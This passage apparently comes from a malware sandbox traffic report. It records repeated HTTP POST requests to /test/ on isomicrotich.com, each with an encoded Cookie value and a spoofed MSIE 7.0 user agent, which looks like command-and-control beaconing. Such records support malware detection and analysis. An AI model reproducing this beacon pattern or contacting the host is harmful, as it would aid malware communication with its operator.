                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HxzAvVvms5Z876I8sXl1vWx6tPmliJLA%2FvvX2oYPiAENw3qxx%2FMCtj%2B%2BNrquSLw1lSadpxXl2DE5Tw1xErgM7bKc8LAcf4fZuOR2Wt%2BWtr4HgbkOTXO6s3%2BxyX99SiDSodOY"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                CF-RAY: 8ccf19f17d074283-EWR
                                                                                                                                                                                                                                                2024-10-03 18:47:33 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                55192.168.2.762356188.114.97.3443
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-10-03 18:47:34 UTC421OUTPOST /test/ HTTP/1.1
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Cookie: kALB+jBIcqFk5uSA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcG
                                                                                                                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                                                                                                                                Host: isomicrotich.com
                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                2024-10-03 18:47:34 UTC603INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 18:47:34 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                vary: accept-encoding
                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BHQ2ssbqkNV3MOUnoyZKn8Y%2FMpMjVq5Am0s7%2BFHy8bXLQhLIRLcRZpNOLaXK6D8%2B1f1rAhlF6QTDm%2FGrkX68AVxLvZgWHZnPKQQ%2FyJKBzo2aO%2BBvKRSds2znIyX%2FN6TjubT7"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                CF-RAY: 8ccf19f7cb2b425c-EWR
                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                2024-10-03 18:47:34 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                56192.168.2.762357188.114.97.3443
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-10-03 18:47:35 UTC421OUTPOST /test/ HTTP/1.1
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Cookie: kALB+jBIcqFk5eSA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcG
                                                                                                                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                                                                                                                                Host: isomicrotich.com
                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                2024-10-03 18:47:35 UTC573INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 18:47:35 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                vary: accept-encoding
                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2F26JTu9l4Nyz%2FoEROX9KyUAmHvgtQQzVbxUxGom4WMaZqrHrXf9QtXPrXntyee2z8jU0w7C50LVsALvncgUe%2B5F9c3qrd%2F6yyR3OH%2BOiaUs%2FssKDQ%2B1HXKpXEzhJ2TZbRaAp"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                CF-RAY: 8ccf19fe3cce5e60-EWR
                                                                                                                                                                                                                                                2024-10-03 18:47:35 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                57192.168.2.762358188.114.97.3443
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-10-03 18:47:36 UTC421OUTPOST /test/ HTTP/1.1
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Cookie: kALB+jBIcqFk5OSA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcG
                                                                                                                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                                                                                                                                Host: isomicrotich.com
                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                2024-10-03 18:47:37 UTC540INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 18:47:37 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PbTIWpKHIxJBSDX3nphYwLE8rXYr2n28KrNm21x100XpSTe%2B1fGid%2B53gTscab4kco03CMroJ9Erdcry0hWO9nhPCkYFzmHYRrBpB5diCACsBhCNrXdFoo8FwcGPFvQCCXwt"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                CF-RAY: 8ccf1a072cac0cae-EWR
                                                                                                                                                                                                                                                2024-10-03 18:47:37 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                58192.168.2.762359188.114.97.3443
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-10-03 18:47:37 UTC421OUTPOST /test/ HTTP/1.1
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Cookie: kALB+jBIcqFk6+SA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcG
                                                                                                                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                                                                                                                                Host: isomicrotich.com
                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                2024-10-03 18:47:38 UTC569INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 18:47:38 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                vary: accept-encoding
                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=G4ZefGtntVMLAekTy1LO1VNhMPG93D5HZkHWQ7M6jVT6Ie84xy5HS4qtpiZR0MF16kSTRslJpBJ7%2Ba2te0IDQB%2BG3WnUDsLRgHd%2FXgtPoBo1b4hauG5WQ%2FNM307%2BA3J4cxqN"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                CF-RAY: 8ccf1a0dca446a59-EWR
                                                                                                                                                                                                                                                2024-10-03 18:47:38 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                59192.168.2.762362188.114.97.3443
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-10-03 18:47:39 UTC421OUTPOST /test/ HTTP/1.1
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Cookie: kALB+jBIcqFk6uSA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcG
                                                                                                                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                                                                                                                                Host: isomicrotich.com
                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                2024-10-03 18:47:39 UTC565INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 18:47:39 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                vary: accept-encoding
                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uoP%2FQvBc7N0cBPILJrf9sfYkdpDDNAYdTeSP5TylbRAAc8X4rRn%2FeJouzrZHFYNC2Q3pt8ZfZ2zVQH02zaFk05i8qp5EpwAyQ8716DI6dnFf5jskT%2FJbLAu2l5QKVPZIA2ZP"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                CF-RAY: 8ccf1a162a4e427c-EWR
                                                                                                                                                                                                                                                2024-10-03 18:47:39 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                60192.168.2.762364188.114.97.3443
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-10-03 18:47:40 UTC421OUTPOST /test/ HTTP/1.1
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Cookie: kALB+jBIcqFn4+SA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcG
                                                                                                                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                                                                                                                                Host: isomicrotich.com
                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                2024-10-03 18:47:40 UTC542INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 18:47:40 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eZfAGYvokzHPB1%2FP3j1sXuloFyUTm0f6f43i4a6CZB79hCg0ZAfiobraVLxl2xHtsDnlIkrwg%2BytXC5rhM18AQnpGm95QkBWAtdqOuR6UvKMoxxjLDiR5ktW%2BqSPsPTL8ryQ"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                CF-RAY: 8ccf1a1c5d5dde98-EWR
                                                                                                                                                                                                                                                2024-10-03 18:47:40 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                61192.168.2.762365188.114.97.3443
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-10-03 18:47:41 UTC421OUTPOST /test/ HTTP/1.1
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Cookie: kALB+jBIcqFn4uSA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcG
                                                                                                                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                                                                                                                                Host: isomicrotich.com
                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                2024-10-03 18:47:42 UTC565INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 18:47:42 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                vary: accept-encoding
                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QKC6eYVO2mA1jvMinx%2FGv6xXbwBSQlCA8xUyD7I617icUTv3c4I1YQpaS4G%2BDoilkPjPrAqpip5ib4XbGFVickwT153rrItBoxcF1m%2FaduBsz2amCnvBXTjlViVTeRzJj32G"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                CF-RAY: 8ccf1a26aa9b43b2-EWR
                                                                                                                                                                                                                                                2024-10-03 18:47:42 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                62192.168.2.762366188.114.97.3443
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-10-03 18:47:42 UTC421OUTPOST /test/ HTTP/1.1
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Cookie: kALB+jBIcqFn4eSA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcG
                                                                                                                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                                                                                                                                Host: isomicrotich.com
                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                2024-10-03 18:47:43 UTC569INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 18:47:43 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                vary: accept-encoding
                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2WwR3nzhCLSTULlKOJ6D9qSOhKqloWlzTbcF9lyJUAPcamZKGqUJJ%2BYbFuTQ1WaT5WRnspVoHEU%2FNXf2itSu%2F64p1EqPKubj%2B0Tr1Zb45Y%2BKOIUzjgLrB03ZcrlTuJxYY8BE"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                CF-RAY: 8ccf1a2d8a2c42a5-EWR
                                                                                                                                                                                                                                                2024-10-03 18:47:43 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                63192.168.2.762368188.114.97.3443
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-10-03 18:47:44 UTC421OUTPOST /test/ HTTP/1.1
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Cookie: kALB+jBIcqFn4OSA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcG
                                                                                                                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                                                                                                                                Host: isomicrotich.com
                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                2024-10-03 18:47:45 UTC571INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 18:47:45 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                vary: accept-encoding
                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IU2X2xVonRCEYAC8tk6o7YyXZNqLWF4UGyGgFxlN5O%2F0j2LSF7rLkD%2F%2F%2BsWYD79%2FlXArKMD30Krv3HhkAXsz1%2BNDGoSOqQJ1PNsAp8lY7U8FcQut7ZSHdajgcEHAbngs61Cf"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                CF-RAY: 8ccf1a38da5078df-EWR
                                                                                                                                                                                                                                                2024-10-03 18:47:45 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                64192.168.2.762371188.114.97.3443
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-10-03 18:47:45 UTC421OUTPOST /test/ HTTP/1.1
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Cookie: kALB+jBIcqFn5+SA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcG
                                                                                                                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                                                                                                                                Host: isomicrotich.com
                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                2024-10-03 18:47:46 UTC565INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 18:47:46 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                vary: accept-encoding
                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UCF1cj65qaWlWTXacv0UWgd5WQTRhXEbdVPcrIzskm4oDQc7Sfxgs9RSb%2BvXCDVwRnyMhJwQkSdI9wRKfG2wGxjq%2BUOa%2BcHIjZTjdhMCJVkf2iIJZkB14JlBUVfx6EvmC6h6"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                CF-RAY: 8ccf1a3f78518c8f-EWR
                                                                                                                                                                                                                                                2024-10-03 18:47:46 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                65192.168.2.762372188.114.97.3443
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-10-03 18:47:47 UTC421OUTPOST /test/ HTTP/1.1
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Cookie: kALB+jBIcqFn5uSA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcG
                                                                                                                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                                                                                                                                Host: isomicrotich.com
                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                2024-10-03 18:47:47 UTC567INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 18:47:47 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                vary: accept-encoding
                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=faVK3KPo%2BAVdF9xODUJIItJj9CVgWC2RagEHFSoUM%2Fv9d%2FbmcPwoYc7LanAScNGtVNXrCrFeX6lyLFOUDDV5ayDtI0WVA0hJz4SD3LFtER73OwHZPcKFr%2BVkRe74eb3YZqBc"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                CF-RAY: 8ccf1a49bfd58c0f-EWR
                                                                                                                                                                                                                                                2024-10-03 18:47:47 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                66192.168.2.762373188.114.97.3443
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-10-03 18:47:49 UTC421OUTPOST /test/ HTTP/1.1
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Cookie: kALB+jBIcqFn5eSA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcG
                                                                                                                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                                                                                                                                Host: isomicrotich.com
                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                2024-10-03 18:47:49 UTC544INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 18:47:49 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=V4qvM8WzzNlkU%2BFwliywEgkNYHsMhhoNvlM4xpNJ16Ri%2BVzQIVODJskHjsbLKa%2BAgQDLvhYmQ0y7UQR2o34apsRFyyUMP9ojoQ1JbuOq6XGh7TOFtwaPNJkpDv%2FCaHn6SYbP"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                CF-RAY: 8ccf1a544ce3c484-EWR
                                                                                                                                                                                                                                                2024-10-03 18:47:49 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                67192.168.2.762375188.114.97.3443
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-10-03 18:47:50 UTC421OUTPOST /test/ HTTP/1.1
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Cookie: kALB+jBIcqFn5OSA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcG
